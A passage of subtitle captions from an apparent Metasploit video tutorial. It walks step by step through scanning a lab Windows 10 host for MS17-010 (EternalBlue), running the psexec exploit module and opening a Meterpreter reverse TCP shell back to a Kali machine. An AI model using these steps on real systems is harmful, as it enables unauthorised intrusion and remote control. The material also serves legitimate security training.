So the first thing I use is perhaps I will search, I'll do a search on SMB because there is a very
362
00:22:32,710 --> 00:22:36,800
popular exploit in Windows using SMB, or I could search on EternalBlue.
363
00:22:37,030 --> 00:22:38,660
So again, either one would be fine.
364
00:22:39,040 --> 00:22:42,040
So there's a lot of SMB over here, so I can do a search on eternal.
365
00:22:43,150 --> 00:22:46,530
And over here we've got five matching modules from our search results.
366
00:22:46,990 --> 00:22:49,990
So the first one is an auxiliary module, admin.
367
00:22:49,990 --> 00:22:53,950
So it would be checking on the EternalBlue SMB Windows
368
00:22:53,950 --> 00:22:55,000
command execution.
369
00:22:55,270 --> 00:22:56,710
We got auxiliary scanner.
370
00:22:56,710 --> 00:23:03,270
So scanner is actually a way for us to scan a system to see if it is vulnerable to a particular exploit.
371
00:23:03,550 --> 00:23:05,230
And of course, we've got a number of exploits here.
372
00:23:05,240 --> 00:23:06,910
We've got two, three, four and five.
373
00:23:07,180 --> 00:23:11,830
So we've got EternalBlue, we got SMB ms17_010.
374
00:23:12,040 --> 00:23:14,290
So again, we've got EternalBlue, EternalBlue Win8.
375
00:23:14,290 --> 00:23:21,190
We got psexec, and of course that is on EternalBlue SMB Remote Windows Code Execution.
376
00:23:21,190 --> 00:23:30,190
We've got SMB DoublePulsar RCE, so we can actually enter use auxiliary/scanner/smb/
377
00:23:30,190 --> 00:23:33,370
smb_ms17_010, hit enter on that, enter show options.
378
00:23:34,660 --> 00:23:39,940
So over here again, if you look carefully back at the slides, we actually have a show options
379
00:23:39,940 --> 00:23:40,570
capability.
380
00:23:40,570 --> 00:23:45,710
So that is the part where we want to find out more information or details about the particular exploit.
381
00:23:45,910 --> 00:23:50,260
So again, we are able to find all that information directly from here by entering show options.
382
00:23:50,740 --> 00:23:53,830
So if you see over here, we can see all the show options available to you on that.
383
00:23:54,340 --> 00:23:55,750
So we can enter set.
384
00:23:56,500 --> 00:23:58,890
Of course, here we can see the parameters that we have to key in.
385
00:23:58,900 --> 00:23:59,650
So required.
386
00:23:59,650 --> 00:24:00,260
No required.
387
00:24:00,310 --> 00:24:02,140
No, no, that's a yes.
388
00:24:02,140 --> 00:24:02,670
Named pipes.
389
00:24:02,680 --> 00:24:07,060
So we have already supplied that information over there, and we have another one, RHOSTS, so we
390
00:24:07,060 --> 00:24:13,300
can actually set RHOSTS and we can actually specify the IP address of the target machine.
391
00:24:13,660 --> 00:24:15,950
So 192.168.1.89.
392
00:24:16,090 --> 00:24:21,940
So go ahead, enter that, 192.168.1.89, hit enter, and then we can actually see
393
00:24:22,240 --> 00:24:25,270
the RHOSTS information, of course, moving forward.
394
00:24:25,300 --> 00:24:27,680
We see that the rest of the information has been filled in.
395
00:24:28,120 --> 00:24:30,090
So once you're done on that, go ahead, hit run.
396
00:24:30,640 --> 00:24:34,120
So again, here we are checking whether the system is vulnerable.
397
00:24:34,300 --> 00:24:40,770
So it says host is likely vulnerable to ms17_010, Windows 10 zero one four three nine
398
00:24:41,030 --> 00:24:41,500
sixty four.
399
00:24:42,370 --> 00:24:47,380
So once we have checked on the system, we can do a search once again to actually find out about what
400
00:24:47,380 --> 00:24:48,350
exploits we can use.
401
00:24:48,370 --> 00:24:55,750
So in this case, we can select number four, so we can enter use exploit/windows/smb/
402
00:24:55,750 --> 00:24:56,320
ms17_010.
403
00:24:57,910 --> 00:25:09,160
So use exploit/windows/smb/ms17_010_psexec, hit enter on that and enter show options.
404
00:25:09,520 --> 00:25:15,010
So again, here we will see what the parameters are that are compulsory for us to actually look into.
405
00:25:15,520 --> 00:25:20,290
So here we got the DBGTRACE, which has already been filled, it has already been filled.
406
00:25:20,560 --> 00:25:22,270
So we've got to fill in RHOSTS.
407
00:25:22,720 --> 00:25:28,240
So RHOSTS is the target IP address, as mentioned earlier, set RHOSTS
408
00:25:28,390 --> 00:25:29,480
192.168.1.89.
409
00:25:29,500 --> 00:25:31,780
So in my case it is 89 again.
410
00:25:31,780 --> 00:25:34,210
In your case it could be a different IP address.
411
00:25:34,420 --> 00:25:40,300
So we can go ahead and hit enter on that, and now we can enter show payloads, what are the payloads available
412
00:25:40,300 --> 00:25:41,720
to go with this exploit?
413
00:25:42,070 --> 00:25:44,460
So again, it's retrieving the information from the database.
414
00:25:44,470 --> 00:25:49,330
So here we can see we've got 208, the number of payloads that we can use.
415
00:25:50,050 --> 00:25:51,500
So here we can see windows x
416
00:25:51,520 --> 00:25:54,160
64, we can see Meterpreter reverse TCP.
417
00:25:54,400 --> 00:25:58,120
So this one is going to be the most suitable for today's tutorial.
418
00:25:58,300 --> 00:26:03,400
We're actually on Meterpreter, so let's scroll up a little more and see that we can see all the windows x
419
00:26:03,520 --> 00:26:09,610
64 Meterpreter shells that we can get, so in this case we are going to be more interested in this
420
00:26:09,610 --> 00:26:09,810
one.
421
00:26:09,820 --> 00:26:11,980
So this is a windows x64
422
00:26:11,980 --> 00:26:14,210
Meterpreter reverse_tcp.
423
00:26:14,260 --> 00:26:15,610
So copy the selection.
424
00:26:16,240 --> 00:26:21,850
I'll scroll all the way down, I'll enter set payload and I'll paste the selection from the clipboard,
425
00:26:22,300 --> 00:26:25,840
so I can paste the selection, hit enter on that, enter show options.
426
00:26:26,200 --> 00:26:31,710
So now because we have a payload that would give us a shell, a reverse shell, we have to set the LHOST
427
00:26:31,720 --> 00:26:33,440
or the local listener hostname.
428
00:26:34,000 --> 00:26:40,080
So what I'm going to do is I'm going to enter ip addr to find the IP address of your Kali Linux machine.
429
00:26:40,090 --> 00:26:44,550
So in this case my Kali Linux machine is 192.168.1.91.
430
00:26:45,010 --> 00:26:46,480
So go ahead and enter set.
431
00:26:47,440 --> 00:26:55,120
192.168.1.91, and enter show options again to check all the options, all the
432
00:26:55,120 --> 00:26:57,940
values, and make sure that you have keyed in the parameters on that.
433
00:26:58,630 --> 00:27:00,010
So here we go, LHOST.
434
00:27:00,010 --> 00:27:06,120
We got the LPORT number as well, and we got all the parameters filled in as well, and RHOSTS.
435
00:27:06,490 --> 00:27:10,170
So once you have all this information in place, go ahead, enter exploit.
436
00:27:10,270 --> 00:27:14,370
And that would give us our shell, allowing me to put a shell into the target machine.
437
00:27:14,800 --> 00:27:17,440
So once you're in the Meterpreter shell, go ahead and enter help.
438
00:27:17,680 --> 00:27:23,200
So once again, in help, we can see all the modules available for us and we can actually see a lot
439
00:27:23,200 --> 00:27:27,010
of information, a lot of capabilities, a lot of things that we can enter into.
440
00:27:27,490 --> 00:27:33,790
So one example is we can actually enter the different kinds of modules that we can use, or the core commands
441
00:27:33,790 --> 00:27:34,490
that we can use.
442
00:27:34,810 --> 00:27:40,350
So the question mark also is a way to pull up the help manual, and we can background a current session.
443
00:27:40,360 --> 00:27:44,490
We can kill processes that are inside a system, we can migrate and so on.
444
00:27:44,500 --> 00:27:50,950
So some of the commonly used ones will be on the system information, sysinfo, so we can go ahead and
445
00:27:50,950 --> 00:27:53,650
scroll all the way down and enter sysinfo.
446
00:27:54,070 --> 00:27:58,030
So it's very important that you try out all these different commands because it will be very helpful
447
00:27:58,030 --> 00:28:03,980
for you to get yourself familiar with Metasploit Framework, so you understand everything about Metasploit Framework.
448
00:28:04,630 --> 00:28:08,440
So once again, I hope you learned something valuable in today's lecture and tutorial.
449
00:28:08,710 --> 00:28:13,300
And if you like what you watch, remember to like and subscribe to the channel so that you can be kept abreast
450
00:28:13,390 --> 00:28:14,830
of the latest episode of the tutorial.
451
00:28:15,130 --> 00:28:19,300
And if you have any questions, feel free to leave a comment below and I'll try my best to answer any of
452
00:28:19,300 --> 00:28:19,900
your queries.
453
00:28:20,590 --> 00:28:22,120
Thank you so much once again for watching.